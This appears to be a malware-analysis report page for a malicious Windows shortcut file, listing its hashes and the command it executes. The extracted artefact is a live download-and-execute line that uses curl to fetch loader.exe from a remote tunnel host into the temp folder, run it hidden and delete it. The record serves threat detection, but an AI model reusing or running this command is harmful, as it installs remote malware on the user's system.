Malicious
Malicious

556c49b40ec4764b781d6d6eb9f97edd

LNK File
|
MD5: 556c49b40ec4764b781d6d6eb9f97edd
|
Size: 1.66 KB
|
application/x-ms-shortcut


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
556c49b40ec4764b781d6d6eb9f97edd
Sha1
661a9533ec7300f2012f2ee3c6506dff0a7952bf
Sha256
aa4b643b0cf8f91532272dc7a1c2426f0da0aceeaa653831ad0daf55df2e6eef
Sha384
132f5cb7b6dd8ee49792d0b4876deb23add1d2e2769987cf29cf20543c87ddef7215461e07e839e9650aceeabca67519
Sha512
2f604380a702a975c21397393dc69f83fe7ecb027bbfe6bf6e8adf8790447062f8c0df855038fb81b96db77846ae1aac7a2d31644b01696824c630cdf0dfeb0c
SSDeep
24:8VZJI5UmtJ1TAY8PA+/2PyJi5iFfa4A+U/FIP4I0aA3yUUXQaR3+9h/LnU+Y+/vm:8C+1vJi51NxfIPzXv3WzU+Yk
TLSH
F931C0552FDA0329D3B2C63B54B5E3824A33B950E9738F5C4280D28C2C65600E836F2B
File Structure
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /c "curl -s -L -o %TEMP%\loader.exe https://wpgbf1zg-5500.euw.devtunnels.ms/64/loader.exe && start /min cmd /c "%TEMP%\loader.exe & del %TEMP%\loader.exe""

556c49b40ec4764b781d6d6eb9f97edd (1.66 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙